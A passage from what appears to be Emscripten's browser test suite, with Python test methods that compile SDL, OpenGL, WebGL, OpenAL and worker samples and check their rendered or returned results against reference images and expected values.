def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
@no_wasm_backend('dynamic linking')
def test_runtimelink(self):
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
@no_wasm_backend('emterpretify')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
@no_wasm_backend('dynamic linking')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--no_private_browsing']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@no_chrome('see #7930')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0', timeout=20)
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0', timeout=20)
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [
[],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
